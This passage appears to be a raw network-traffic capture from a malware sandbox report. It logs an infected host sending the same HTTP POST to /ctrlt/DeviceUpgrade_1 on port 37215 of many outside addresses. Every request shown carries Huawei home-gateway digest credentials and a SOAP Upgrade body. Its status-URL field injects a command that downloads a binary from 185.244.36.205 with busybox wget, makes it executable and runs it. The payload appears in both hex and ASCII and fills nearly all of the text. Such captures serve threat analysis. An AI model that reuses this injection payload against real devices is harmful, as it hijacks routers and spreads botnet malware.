                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1321192.168.2.153698494.137.39.12037215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:18.398369074 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1322192.168.2.153849637.244.130.23737215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:18.398389101 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1323192.168.2.156042231.182.169.8537215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:18.398406029 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1324192.168.2.154913231.233.40.18837215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:18.398431063 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1325192.168.2.1544892186.237.25.3437215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:18.398447990 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1326192.168.2.154025641.233.125.18837215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:18.398469925 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1327192.168.2.1542904190.148.243.9737215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:18.398494005 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1328192.168.2.1549630138.51.249.5737215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:18.398508072 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1329192.168.2.1533430156.44.192.18737215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:18.398529053 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1330192.168.2.1558040222.223.61.20337215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:18.398542881 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1331192.168.2.1545286219.193.30.25037215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:18.398562908 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
